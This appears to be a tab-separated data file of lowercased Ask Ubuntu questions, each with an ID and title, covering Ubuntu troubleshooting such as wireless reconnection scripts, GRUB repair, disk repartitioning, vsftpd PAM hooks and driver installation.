406452	how to force wireless to reconnect when connection has been lost	i am running ubuntu server 13.10 ( saucy ) on my at home server . it connects to a wireless router using an intel wireless pci-express card . for the most part it works fine but occasionally i have to reboot the router and when that happens the server is no longer available through the local network until i physically reboot the server . i 've tried following the instructions from the answer to server automatic reconnect ? it makes sense . i created /usr/local/bin/check_network and chmod +xed it : # ! /bin/bash # the router ip address . ip_address='192.168.3.1' # ping to determine if we are connected to the network . if ! ( ping -c 1 `` $ ip_address '' > /dev/null 2 > & 1 ) ; then # if we are not connected , restart networking . service networking restart > /dev/null 2 > & 1 fi note : it 's networking and not network according to sudo service -- status-all . i added it to root 's crontab to run every minute : * * * * * /usr/local/bin/check_network then i tried testing it with sudo service networking stop , but the server never becomes available on the network until reboot ( as usual ) . here 's the print out from sudo lshw -class network if it 's any help ( wlan0 is what 's used ) : *-network description : wireless interface product : centrino advanced-n 6205 [ taylor peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 34 serial : 6c:88:14:99:1b:9c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.11.0-13-generic firmware=18.168.6.1 ip=192.168.3.50 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:42 memory : fea00000-fea01fff *-network disabled description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 06 serial : bc:5f : f4 : e5 : a4 : c5 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:40 ioport : e000 ( size=256 ) memory : d0004000-d0004fff memory : d0000000-d0003fff and here 's /etc/network/interfaces : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto wlan0 iface wlan0 inet dhcp # wireless-* options are implemented by the wireless-tools package wireless-mode managed wireless-essid mywifi wireless-key1 ********** how can i get this working ? i must be missing something painfully obvious . any help would be appreciated . here 's /var/log/syslog before i reboot the router : jan 17 22:10:01 caleb-srv-pons cron [ 1431 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:10:31 caleb-srv-pons kernel : [ 486.640712 ] [ ufw block ] in=wlan0 out= mac=6c:88:14:99:1b:9c:00:25:9c:52:6a:18:08:00 src=118.69.206.219 dst=192.168.3.50 len=48 tos=0x00 prec=0x20 ttl=112 id=18350 proto=tcp spt=11829 dpt=5900 window=65535 res=0x00 syn urgp=0 jan 17 22:10:35 caleb-srv-pons kernel : [ 490.189061 ] [ ufw block ] in=wlan0 out= mac=6c:88:14:99:1b:9c:00:25:9c:52:6a:18:08:00 src=198.252.206.25 dst=192.168.3.50 len=121 tos=0x00 prec=0x20 ttl=49 id=50333 df proto=tcp spt=443 dpt=48715 window=36 res=0x00 ack psh urgp=0 jan 17 22:11:01 caleb-srv-pons cron [ 1436 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:11:14 caleb-srv-pons kernel : [ 529.312196 ] [ ufw block ] in=wlan0 out= mac=6c:88:14:99:1b:9c:00:25:9c:52:6a:18:08:00 src=198.252.206.25 dst=192.168.3.50 len=121 tos=0x00 prec=0x20 ttl=49 id=9328 df proto=tcp spt=443 dpt=48565 window=36 res=0x00 ack psh urgp=0 jan 17 22:12:01 caleb-srv-pons cron [ 1440 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:12:35 caleb-srv-pons kernel : [ 610.181844 ] [ ufw block ] in=wlan0 out= mac=6c:88:14:99:1b:9c:00:25:9c:52:6a:18:08:00 src=198.252.206.25 dst=192.168.3.50 len=121 tos=0x00 prec=0x20 ttl=49 id=50334 df proto=tcp spt=443 dpt=48715 window=36 res=0x00 ack psh urgp=0 jan 17 22:13:01 caleb-srv-pons cron [ 1444 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:13:14 caleb-srv-pons kernel : [ 649.301520 ] [ ufw block ] in=wlan0 out= mac=6c:88:14:99:1b:9c:00:25:9c:52:6a:18:08:00 src=198.252.206.25 dst=192.168.3.50 len=121 tos=0x00 prec=0x20 ttl=49 id=9329 df proto=tcp spt=443 dpt=48565 window=36 res=0x00 ack psh urgp=0 jan 17 22:14:01 caleb-srv-pons cron [ 1448 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:14:34 caleb-srv-pons kernel : [ 730.180571 ] [ ufw block ] in=wlan0 out= mac=6c:88:14:99:1b:9c:00:25:9c:52:6a:18:08:00 src=198.252.206.25 dst=192.168.3.50 len=121 tos=0x00 prec=0x20 ttl=49 id=50335 df proto=tcp spt=443 dpt=48715 window=36 res=0x00 ack psh urgp=0 jan 17 22:15:01 caleb-srv-pons cron [ 1454 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:15:14 caleb-srv-pons kernel : [ 769.300852 ] [ ufw block ] in=wlan0 out= mac=6c:88:14:99:1b:9c:00:25:9c:52:6a:18:08:00 src=198.252.206.25 dst=192.168.3.50 len=121 tos=0x00 prec=0x20 ttl=49 id=9330 df proto=tcp spt=443 dpt=48565 window=36 res=0x00 ack psh urgp=0 then when i reboot the router it changes to : jan 17 22:16:01 caleb-srv-pons cron [ 1459 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:17:01 caleb-srv-pons cron [ 1466 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:17:01 caleb-srv-pons cron [ 1467 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) jan 17 22:17:28 caleb-srv-pons kernel : [ 903.335148 ] cfg80211 : calling crda to update world regulatory domain jan 17 22:17:28 caleb-srv-pons kernel : [ 903.345400 ] cfg80211 : world regulatory domain updated : jan 17 22:17:28 caleb-srv-pons kernel : [ 903.345416 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) jan 17 22:17:28 caleb-srv-pons kernel : [ 903.345425 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 17 22:17:28 caleb-srv-pons kernel : [ 903.345433 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 17 22:17:28 caleb-srv-pons kernel : [ 903.345440 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jan 17 22:17:28 caleb-srv-pons kernel : [ 903.345447 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 17 22:17:28 caleb-srv-pons kernel : [ 903.345453 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 17 22:18:01 caleb-srv-pons cron [ 1475 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:18:11 caleb-srv-pons cron [ 1474 ] : ( cron ) info ( no mta installed , discarding output ) jan 17 22:19:01 caleb-srv-pons cron [ 1481 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:19:04 caleb-srv-pons cron [ 1480 ] : ( cron ) info ( no mta installed , discarding output ) jan 17 22:20:01 caleb-srv-pons cron [ 1487 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:20:04 caleb-srv-pons cron [ 1486 ] : ( cron ) info ( no mta installed , discarding output ) the repeated logs for /usr/local/bin/check_network is the minutely cronjob to check the network which is : # ! /bin/bash # use ip address of router . ip_address='192.168.3.1' # ping to determine if we are connected to the network . if ! ( ping -c 1 `` $ ip_address '' ) ; then # if we are not connected , restart networking . echo 'restart wlan0 . ' # service networking restart ifdown wlan0 ifup wlan0 else echo 'already connected . ' fi and its log /root/check_network.log is like this before the router reboot : ping 192.168.3.1 ( 192.168.3.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.3.1 : icmp_seq=1 ttl=64 time=1.88 ms -- - 192.168.3.1 ping statistics -- - 1 packets transmitted , 1 received , 0 % packet loss , time 0ms rtt min/avg/max/mdev = 1.889/1.889/1.889/0.000 ms already connected . ping 192.168.3.1 ( 192.168.3.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.3.1 : icmp_seq=1 ttl=64 time=5.58 ms -- - 192.168.3.1 ping statistics -- - 1 packets transmitted , 1 received , 0 % packet loss , time 0ms rtt min/avg/max/mdev = 5.585/5.585/5.585/0.000 ms already connected . and after reboot : ping 192.168.3.1 ( 192.168.3.1 ) 56 ( 84 ) bytes of data . -- - 192.168.3.1 ping statistics -- - 1 packets transmitted , 0 received , 100 % packet loss , time 0ms restart wlan0 . ping 192.168.3.1 ( 192.168.3.1 ) 56 ( 84 ) bytes of data . from 192.168.3.50 icmp_seq=1 destination host unreachable -- - 192.168.3.1 ping statistics -- - 1 packets transmitted , 0 received , +1 errors , 100 % packet loss , time 0ms restart wlan0 . and syslog behaves exactly the same whether i use ifdown and ifup , or service networking restart : jan 17 22:46:02 caleb-srv-pons cron [ 1624 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:46:08 caleb-srv-pons kernel : [ 1212.166874 ] [ ufw block ] in=wlan0 out= mac=6c:88:14:99:1b:9c:00:25:9c:52:6a:18:08:00 src=79.41.235.44 dst=192.168.3.50 len=60 tos=0x00 prec=0x20 ttl=49 id=63141 df proto=tcp spt=61620 dpt=63125 window=5840 res=0x00 syn urgp=0 jan 17 22:46:11 caleb-srv-pons kernel : [ 1215.184848 ] [ ufw block ] in=wlan0 out= mac=6c:88:14:99:1b:9c:00:25:9c:52:6a:18:08:00 src=79.41.235.44 dst=192.168.3.50 len=60 tos=0x00 prec=0x20 ttl=49 id=63142 df proto=tcp spt=61620 dpt=63125 window=5840 res=0x00 syn urgp=0 jan 17 22:46:17 caleb-srv-pons kernel : [ 1221.167630 ] [ ufw block ] in=wlan0 out= mac=6c:88:14:99:1b:9c:00:25:9c:52:6a:18:08:00 src=79.41.235.44 dst=192.168.3.50 len=60 tos=0x00 prec=0x20 ttl=49 id=63143 df proto=tcp spt=61620 dpt=63125 window=5840 res=0x00 syn urgp=0 jan 17 22:46:29 caleb-srv-pons kernel : [ 1233.166485 ] [ ufw block ] in=wlan0 out= mac=6c:88:14:99:1b:9c:00:25:9c:52:6a:18:08:00 src=79.41.235.44 dst=192.168.3.50 len=60 tos=0x00 prec=0x20 ttl=49 id=63144 df proto=tcp spt=61620 dpt=63125 window=5840 res=0x00 syn urgp=0 jan 17 22:46:53 caleb-srv-pons kernel : [ 1257.170816 ] [ ufw block ] in=wlan0 out= mac=6c:88:14:99:1b:9c:00:25:9c:52:6a:18:08:00 src=79.41.235.44 dst=192.168.3.50 len=60 tos=0x00 prec=0x20 ttl=49 id=63145 df proto=tcp spt=61620 dpt=63125 window=5840 res=0x00 syn urgp=0 jan 17 22:47:01 caleb-srv-pons cron [ 1629 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:48:01 caleb-srv-pons cron [ 1633 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:49:01 caleb-srv-pons cron [ 1637 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:50:01 caleb-srv-pons cron [ 1641 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:51:01 caleb-srv-pons cron [ 1645 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:52:01 caleb-srv-pons cron [ 1649 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:53:01 caleb-srv-pons cron [ 1654 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:54:01 caleb-srv-pons cron [ 1658 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:55:01 caleb-srv-pons cron [ 1662 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:55:12 caleb-srv-pons kernel : [ 1755.584612 ] cfg80211 : calling crda to update world regulatory domain jan 17 22:55:12 caleb-srv-pons kernel : [ 1755.594903 ] cfg80211 : world regulatory domain updated : jan 17 22:55:12 caleb-srv-pons kernel : [ 1755.594919 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) jan 17 22:55:12 caleb-srv-pons kernel : [ 1755.594928 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 17 22:55:12 caleb-srv-pons kernel : [ 1755.594935 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 17 22:55:12 caleb-srv-pons kernel : [ 1755.594943 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jan 17 22:55:12 caleb-srv-pons kernel : [ 1755.594950 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 17 22:55:12 caleb-srv-pons kernel : [ 1755.594957 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 17 22:56:01 caleb-srv-pons cron [ 1668 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log ) jan 17 22:57:01 caleb-srv-pons cron [ 1679 ] : ( root ) cmd ( /usr/local/bin/check_network > > /root/check_network.log )
406456	ubuntu 12.04 new kernel taking way more cpu usage	i recently upgraded to linux kernel 3.2.0-58 on ubuntu 12.04 . it works well but today i noticed that it was using 60 % cpu usage of the computer . the only programs that were open were gkrellm system monitor and 2 screenlets from the screenlets application that i use . when i was using the old kernel ( which i do n't know the version of ) it only used about 20-25 % of cpu with the same programs open . is this normal and is there a way to get the cpu usage lower ?
406457	install nvidia driver in 12.04	i installed it 2 or 3 times and every time it disappear my desktop , icons and launch bar it make me install ubuntu from began how can i install nvidia wright ? and if this problem happened again how can i uninstall the driver ?
406462	batch convert images from one format to another while maintaining directory structure , and removing originals	i 've looked at this question , and while it works there a few issues : all converted images are placed in the directory from which the command is called . the original images are kept . i need to convert around 70,000 .tif and .jpgs to .pngs . it 's really important the the files when converted are placed in their normal directories . i can do a batch rm of .tff/.jpg 's at the end if that 's the best way to handle removing the old files .
406463	how can i flip a single bit in a file ?	i want to intentionally damage a file in order to test the claims that btrfs can heal itself . the article talks about taking the filesystem off , damaging a photo by `` flipping '' a single bit and then remounting it . in older filesystems this would just be corrupted but it 's supposed to fix itself in btrfs . in theory , this makes sense but i really want to test it . the problem is the article does n't explain how to do any of that . how would i go about changing a single bit in a very specific part of a filesystem ? i should also point out that this must be done on an offline filesystem so that btrfs does n't see my write as intentional . edit : while the question ( and discussion ) talks a lot about btrfs , i 'd like to know if there are filesystem independant methods of implementing this sort of corruption ( so that it can be compared across different raid types/controllers/etc ) .
406464	ubuntu 12.04 guest on mac osx 10.9.1 host runs painfully slow ( but much faster when use external monitor )	i installed unbutu 12.04 in virtualbox 4.3.2 on a macbook pro two months ago . it worked fine . few days ago , i used migration assistant to move everything from the previous macbook to a new one . i did n't realise until just now that the ubuntu vm runs rather slow . the weird thing is it runs much faster on a external monitor that i connected to the laptop , but a loooot more slower on the main screen . does anyone may have a clue about this ? many thanks !
406467	is mounting box with ftp a workable solution ?	i have been searching high and low for a solution to be able to mount box as a drive with ubuntu 13.10 . as you all know , there is no linux sync tool except the very limited one at github here , which is very primitive and does n't seem to work . i 've also tried the approaches suggested in how can i use box.com to sync my home directory across machines ? , including : mount from nautilus ( does n't work because nautilus 3.8 does n't have advanced server connect options any more ) mount from webdav with davfs2 ( does n't work at all , but this might be a problem peculiar to my box setup , which is through my university and may have different settings than the normal box webdav ) mount with some webdav tool such as conduit , easy sme , etc ( gui ) or cadver ( command line ) . none of them work , but again it could be my institution 's settings , which are n't very clear . finally , i successfully mounted box through ftp or ftps with nautilus , and then simply created a link to the folder i want in my home directory with : sudo ln -s /run/user/1000/gvfs/ftpfolder /home/user ( or ~/ ) my question is : is this a good solution ? will box ftp with a linked folder function just like webdav or the mounted dropbox or other types of online storage ?
406468	grub issue after update from ubuntu 10.04 to 12.04	hi i have updated my dell t7500 desktop to ubuntu 12.04 and when i tried to reboot i got grub rescue mode . i have booted to live cd and used boot repair as instructed here : https : //help.ubuntu.com/community/boot-repair at first i tried default repair but it did n't solve the problem , here is the first paste : http : //paste.ubuntu.com/6761969/ then i tried many options like purge grub , install it on only one partition ( i tried several options ) and at the end i did a default settings repair again and after this last one only windows boots automatically and i do n't even get a choice of os . here is my last paste : http : //paste.ubuntu.com/6762811/ i do n't know what else to do , i do n't want to reinstall , how could i fix this ? thnks edit : i had also tried following these instructions on grub rescue recovering from 'grub rescue > ' crash but unfortunately it says something about linux not found
406472	display brightness goes all the way up or all the way down when i make slight adjustement	i just fresh installed ubuntu 13.10 on a msi ms-16362 laptop . when ever i try to increase the display brightness with fn + f5 or decrease it with fn + f4 , the brightness amount either goes through every brightness value until it is at it 's brightest or dimmest . i installed the brightness indicator shown here http : //ubuntuhandbook.org/index.php/2013/11/install-brightness-indicator-in-ubuntu-13-10-saucy/ and even if i change the brightness from the indicator drop down , it will either go all the way down or all the way up . e.g . if the brightness is at max ( 8 on the indictor drop down ) i can set it at 4 but the brightness of the screen will go all the way down . 4 will remain checked on the brightness drop down though . how can i fix this ridiculous problem ? more info on my set up my msi ms-16362 laptop has an nvidia geforce 8400m g 256mb video card in it . i am using the open source driver for it . when i tried switching to the nvidia tested driver , it broke ubuntu or the display part of it and i could not access the os anymore so i had to reinstall .
406474	assign keyboard shortcut / hotkey to any toggle visibility of any window	i would like to assign a keyboard shortcut ( alt + w ) to toggle the visibility of an instance of a google chrome window . read the ubuntu guide to keyboard shortcuts but no luck thanks
406477	ubuntu vps repartition disk from command line	i know there are a lot of similar questions on askubuntu , but any of them did not solve my problem . i have virtual server with ubuntu 12.04 . i need more disk space for larg mysql db ( ~140gb ) . admins provided additional space and now i have to do repartition of hdd . i tried to find out how can i do it through command line , but i did not find much info about this . cfdisk shows that i have logical lvm2 partiotion ( this is my current disk ) and below is pri/log free spave - this is my additional space that i need to add to disk . i tried to change disk size with lvm pvresize -- setphysicalvolumesize 190g /dev/sda5 it did not help . after this pvdisplay shows correct result ( i.e new correct size ) , but neither fdisk -l nor df -h does not display new space . how can i finish repartition correct ? thanks
406478	rename all the files `` file.txt '' in directory with multiple subdirectories	if i have a directory1 which has a `` file.txt '' and subdirectories : `` week '' , `` today '' , `` last month '' . in `` week '' and `` last month '' is also `` file.txt '' . directory1/ file.txt week/ file.txt today/ last month/ file.txt how could i , using only one line command in terminal with the command mv or rename.ul , rename every `` file.txt '' in `` directory1 '' into `` new_file.txt '' ?
406480	download awk to ubuntu	how to download awk to ubuntu , since i tried to use asorti function and it told me that there is an error on this asorti . i tried many scripts that used asorti function and the same error occure !
406481	duplicity gnupg passphrase for dejadup backup	i 'm using deja dup backup and it backups everyday to my nas . since there is no limit to the nas folder , the backup keeps growing and growing and now i want to delete old backups using this command : duplicity remove-older-than 1y -- force file : ///nas-folder it then asks for a gnupg passphrase but i have no idea ? deja dup asks for a password once in a while to verify the backups and i give him a password , but duplicity does n't accept that password . i think it 's the only one i have related to the backup . do i need another password to remove the old files ? or is there another way to remove the old files ? and do i need to be worried that i do n't have the passphrase , can i still recover the backup using deja dup ? thanks
406482	uninstalling issue	i installed ubuntu through a usb stick . i did n't create any partition for it . i 'm not sure of where ubuntu has been installed now . i did not have any data loss on any of the local drive volumes after installation of ubuntu . i want to uninstall it . how should i proceed with it ?
406483	unable to install cint on ubuntu 12.04	i am trying to build cint from sources on ubuntu 12.04 . however it complains about libreadline : ~/desktop/cint-5.18.00 âť ./configure guessing architecture to be linuxx8664gcc using current cint core please install the package `` libreadline or [ lib ] readline-dev [ el ] '' ! i have libreadline6 , libreadline-dev and libreadline6-dev installed . what should i do ? edit : using -- readlinelib option below i am able to run configure , make and make install : /usr/local/include/cint /usr/local/include/cint/cintdictversion.h /usr/local/include/cint/configcint.h /usr/local/share/cint /usr/local/share/cint/cint /usr/local/share/cint/cint/lib/qt/qtcint.h /usr/local/share/cint/cint/lib/wintcldl83/cintlib.c /usr/local/share/cint/cint/lib/socket/cintsock.h /usr/local/share/cint/cint/lib/socket/cintsock.c /usr/local/share/cint/cint/lib/dll_stl/cinteh.h /usr/local/share/cint/cint/lib/win32api/cintwin.h /usr/local/share/cint/cint/lib/gl/cintgl.h /usr/local/share/cint/cint/lib/cintocx /usr/local/share/cint/cint/lib/cintocx/cintocx.aps /usr/local/share/cint/cint/lib/cintocx/cintocx.h /usr/local/share/cint/cint/lib/cintocx/cintocx.cpp /usr/local/share/cint/cint/lib/cintocx/cintocx.ico /usr/local/share/cint/cint/lib/cintocx/cintocxctl.cpp /usr/local/share/cint/cint/lib/cintocx/cintocxctl.bmp /usr/local/share/cint/cint/lib/cintocx/cintocx3.bmp /usr/local/share/cint/cint/lib/cintocx/cintocx.clw /usr/local/share/cint/cint/lib/cintocx/cintocxctl.h /usr/local/share/cint/cint/lib/cintocx/cintocxppg.h /usr/local/share/cint/cint/lib/cintocx/cintocx.mdp /usr/local/share/cint/cint/lib/cintocx/cintocx.odl /usr/local/share/cint/cint/lib/cintocx/cintocxppg.cpp /usr/local/share/cint/cint/lib/cintocx/cintocx.mak /usr/local/share/cint/cint/lib/cintocx/cint-ocx /usr/local/share/cint/cint/lib/cintocx/cintocx.rc /usr/local/share/man/man1/makecint.1 /usr/local/share/man/man1/cint.1 /usr/local/lib/libcint.so /usr/local/lib/libcint_static.a /usr/local/lib/clang/3.5/include/f16cintrin.h /usr/local/bin/cint /usr/local/bin/cint-config /usr/local/bin/makecint but when i try to run it i get : ~/desktop/cint-5.18.00 âť cint cint : error while loading shared libraries : libcint.so : can not open shared object file : no such file or directory thanks
406485	enable new program in dash	i installed new program ( genymotion ) and so far so good , it runs from terminal and when double click executable inside install folder . how do i enable startup functionality in dash ? when i type name of software , dash will search and locate but will not launch . is there a path command that needs to be edited ? thanks for ur help .
406486	vsftpd hanging when using pam_exec or pam_script	i have vsftpd integrated with pam_mysql , allowing me to successfully login to an ftp server using accounts kept in a mysql database . i need to automatically create a directory for the user if it is the first time they 've logged into the server . i 've seen suggestions to use pam_script or pam_exec to achieve this . as a test i 've revised my /etc/pam.d/vsftpd configuration to include the following line : account optional pam_exec.so debug log=/tmp/pam_exec.log /etc/pam-script/test.sh the script just echoes the user : # ! /bin/sh echo $ pam_user in /var/log/auth.log i can see that the script is being called : jan 16 17:15:44 ip-172-31-8-61 vsftpd : pam_exec ( vsftpd : auth ) : calling /etc/pam-script/dir.sh ... however the ftp login does n't complete . the connection hangs . all subsequent connections fail and i have to restart the service to get it to respond . i 've ruled out problems with the configuration/script by also tweaking the pam config for sshd logins , this seems to work fine . i 've also tested this using the pam_script module and get similar results when the pam_script_auth script is called . the problem seems to be that vsftp is n't able to complete a login if there are additional steps in the pam configuration . i 've tried different settings ( auth , account ) and different requirements levels ( optional , required ) without any success . anyone have any ideas ? update : ubuntu 12.04 . using a tweaked version of vsftp as described here
406488	apt-get package is not available but is referred to by another package - but can not find that package	when i try to install a package with apt-get install , i 'll occasionally see a message of the form package somepackage is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package somepackage has no installation candidate does anyone know how to find out what package ( s ) it is actually referring to ? note : i looked at `` but is referred to by another package . '' - finding that package and it suggested using apt-cache search to find the package that refers to it . yet if i do this for somepackage , i wo n't get any output . for example , apt-cache search openoffice.org-hunspell returns no output , but apt-cache search gcc returns several packages . edit : there are several different packages that have caused the first part of the problem for me in the past , but the apt-cache search not turning anything up has ( so far ) only happened for the openoffice.org-hunspell package . i guess that what i want to know the most is this : when i see the error message `` package somepackage has no installation candidate , '' i 'd like to have a sure-fire way to know a ) was it replaced with another package ( in which case knowing what the new package name is would be helpful ) ; or b ) was it just removed altogether ; or c ) is there some problem with /etc/apt/sources.list that means i ca n't get it .
406489	some smart scopes not working	in addition to one of my questions here on this site , i discovered that a lot of my enabled smart scopes do not work in ubuntu 13.10 . for example zotero , almost all music lenses except banshee etc ... in fact , the only thing that works flawlessly is the local file search lens and the applications lens . reinstallation of unity-scope* and unity-lens* or rm -rf .local/share/zeitgeist/ does n't help either ... is there anything i can do about that , or is it a bug i should report ? how does a working smart-scope look like ?
406490	dual boot - wireless disabled	i 'm in a ubuntu/win 7 dual boot . when i go on windows , the next time i try to go on ubuntu it will say my wireless is disabled by hardware using the fn key does n't do anything , i have to reset the bios ( cause i do n't know which setting is doing that . turn back from uefi to legacy . so it 's anoying , even if it 's not difficult
406491	how to create and link a ~/bin folder to contain executables .	is it possible to create a folder e.g.~/bin which contains executables , and once a file is added to this folder , it is executable from command line . ( just like an executable in /bin )
406496	wifi internet access drops in3 minutes	i have a thinkpad e430 , using ubuntu 13.04 . wireless was working ok until yesterday , i think this started happening after installing and running ap-hotspot from ppa : nilarimogard/webupd8 . after connecting to a wireless network everything works fine for about 3 minutes , then i lose the internet connectivity . wireless is still connected , but : ping 8.8.8.8 ping 192.168.1.1 ( primary dns according to connection information ) ping anything except myself ( 192.168.1.25 or 127.0.0.1 ) : from 192.168.1.25 icmp_seq=1 destination host unreachable ping domainname.xy : nothing at all , obviously stuck at trying to get a dns response ping 192.168.1.25 ( myself ) : response okay . when the connection dies , i can manually disconnect and connect it again and it works for another 3 minutes . when i go to software & updates- > additional drivers , it says there are none for me . i was quite satisfied with ap-hotspot , for its ease of use . thank you all . update : removed ap-hotspot , did not help . update : it seems this is only a problem with one specific wireless network deleting it from the connections and reconfiguring did not help .
406497	laptop with battery is faster than power connection at ubuntu 13.04	recently , i found a very strange phenomenon on my laptop . when the laptop is plug-in the power , then the cpus work slowly , but when it is unplugged , i.e . it works with battery , then the cpus work with full speed . why does my laptop shows reverse phenomenon ? how to fix this problem ? here are detailed information on my laptop . the ubuntu version : 13.04 cpu : intel ( r ) core ( tm ) i7-3630qm cpu @ 2.40ghz i7z result when plug-in : ( the 800 mhz is the speed limit when plug-in ) cpu speed from cpuinfo 2394.00mhz cpuinfo might be wrong if cpufreq is enabled . to guess correctly try estimating linux 's inbuilt cpu_khz code emulated now true frequency ( without accounting turbo ) 2394 mhz cpu multiplier 24x || bus clock frequency ( bclk ) 99.75 mhz socket [ 0 ] - [ physical cores=4 , logical cores=8 , max online cores ever=4 ] turbo enabled on 4 cores , hyper threading on max frequency without considering turbo 2493.75 mhz ( 99.75 x [ 25 ] ) max turbo multiplier ( if enabled ) with 1/2/3/4 cores is 34x/33x/32x/32x real current frequency 796.96 mhz [ 99.75 x 7.99 ] ( max of below ) core [ core-id ] : actual freq ( mult . ) c0 % halt ( c1 ) % c3 % c6 % core 1 [ 0 ] : 796.96 ( 7.99x ) 1.87 5.86 0 0 core 2 [ 2 ] : 796.57 ( 7.99x ) 3.04 5.86 0 0 core 3 [ 4 ] : 796.72 ( 7.99x ) 1.02 1.72 0 0 core 4 [ 6 ] : 796.64 ( 7.99x ) 1.09 2.29 0 0 c0 = processor running without halting c1 = processor running with halts ( states > c0 are power saver ) c3 = cores running with pll turned off and core cache turned off c6 = everything in c3 + core state saved to last level cache above values in table are in percentage over the last 1 sec
406507	on which disk device ubuntu has been installed ?	i 've chosen 'something else ' for the installation type so as to designate the disk partition ( device ) that i want to install ubuntu . after installation is completed , i 'm not sure that i 've selected the partition i want . is there a way to check which disk partition ubuntu has been installed on ?
406511	ca n't mount 4k disk partitioned in win7	i have a 4k disk that was partitioned and formatted as ntfs in windows . when i try mount that disk in ubuntu 12.04 it tries to mount it as a 512b-per-sector disk . under ubuntu : model : ata wdc wd10ezex-00b ( scsi ) disk /dev/sdb : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 131kb 125gb 125gb primary i confirmed that it was partitioned as 4k by hexdumping the mbr on , taking the sector offset for the first partition and calculating the physical offset on disk using either 512b sectors or 4kb sectors . when using 512b sectors i did n't find the ntfs partition header but using 4kb sectors i did . mounting this disk in ubuntu does n't work : mount -t ntfs /dev/sdb1 /mnt/test ntfs signature is missing . this leads me to believe that ubuntu is treating this disk as a 512b-per-sector disk . how can i force ubuntu to use 4kb sectors on this disk without destroying anything on the disk ?
406512	after ubuntu 12.04.3 instal disc disappears a grub menu not appear	i am new with linux . a was using win7 , now i instaled ubuntu 12.04.3 on the second hdd ( i used `` something else '' option , create swap drive with 4 gb and primary ext4 with rest of the space ) . but after restart grub menu doesn´t show up - so windows starts and the disc where ubuntu should be disappers . so i can´t access ubuntu . already instaled ubuntu 3 times , but the same thing happened . i probably messed up something somewhere , bud don´t know what and where . thank you for any help .
